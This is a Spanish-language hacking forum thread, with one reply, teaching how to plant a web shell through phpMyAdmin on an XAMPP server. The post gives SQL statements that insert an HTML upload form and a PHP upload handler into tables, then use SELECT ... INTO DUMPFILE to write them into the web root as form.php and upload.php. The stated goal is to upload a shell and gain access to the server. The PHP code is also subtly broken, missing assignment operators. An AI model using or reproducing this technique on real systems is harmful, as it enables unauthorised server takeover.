comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Subir shell desde phpmyadmin (xampp)

  • 1 Respuestas
  • 2937 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Decode

  • *
  • Underc0der
  • Mensajes: 38
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Julio 09, 2015, 03:29:07 pm »
Hola gente, aquí les vengo a enseñar como subir una shell desde phpmyadmin:

1- Lo primero que debemos hacer es tener acceso al phpmyadmin.
2- Luego crear una base de datos dentro del phpmyadmin con el nombre que quieran.
3- Luego de que la base de datos este creada nos vamos a SQL y empezamos a poner los siguientes códigos:

El primero es este:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
CREATE TABLE `NOMBRE DE LA DB`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

Luego de haber hecho esto debemos dar a continuar y poner un nuevo código, que es este:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
CREATE TABLE `NOMBRE DE LA DB`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

Luego de haber hecho este segundo paso insertamos el nuevo código con los mismos pasos anteriores, que es este:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload</title>
</head>
<body bgcolor="black">
<div style=" color:white;text-align:center; margin-top:60px; font-size:25px;
">Upload</div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>');

Luego de haber insertado el tercer código nos vamos a lo siguiente:
 
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform
Luego de haber hecho este paso insertaremos el siguiente código con los mismos pasos anteriores:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
INSERT INTO user_upload
VALUES (
"<?php $uploaddir 'C:/xampp/htdocs/'$uploadfile $uploaddir basename($_FILES['userfile']['name']); if 

(
move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=black></br></br><div 

align=center><font size=5 color=white>File uploaded successfully</font></body>'
; } else { print '<body 

bgcolor=black></br></br><div align=center><font size=5 color=red>Error when uploading the file</font></body>'
; } ?>
"
)

Ya hecho este penúltimo paso nos vamos al último código que nos dará el privilegio de subir la shell al directorio principal del servidor:
 
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload
Ya terminado todos estos pasos tendremos el privilegio de subir shell al directorio principal y tener acceso al servidor o host. Para dirigirnos al upload debemos ir a No tienes permisos para ver links. Registrate o Entra con tu cuenta y así podremos subir la shell.

Saludos.
« Última modificación: Julio 17, 2018, 05:19:01 pm por Decode »

Conectado DeBobiPro

  • *
  • Underc0der
  • Mensajes: 210
  • Actividad:
    1.67%
  • Reputación 2
  • Como no sabía que era imposible, lo hice.
    • Ver Perfil
« Respuesta #1 en: Julio 09, 2015, 04:51:14 pm »
Interesante BRO!

andaba buscando algo así, lo probaré y les cuento como me va.



Saludos!
Nivel 77 No tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!



Desarrollo de exploits con metasploit desde cero en (ESPAÑOL)

Iniciado por REC

Respuestas: 1
Vistas: 3307
Último mensaje Mayo 17, 2012, 03:29:55 pm
por kid_goth
[Propuesta] Taller de Pentesting desde 0

Iniciado por blood_rec

Respuestas: 38
Vistas: 14488
Último mensaje Octubre 06, 2012, 09:38:16 am
por Barym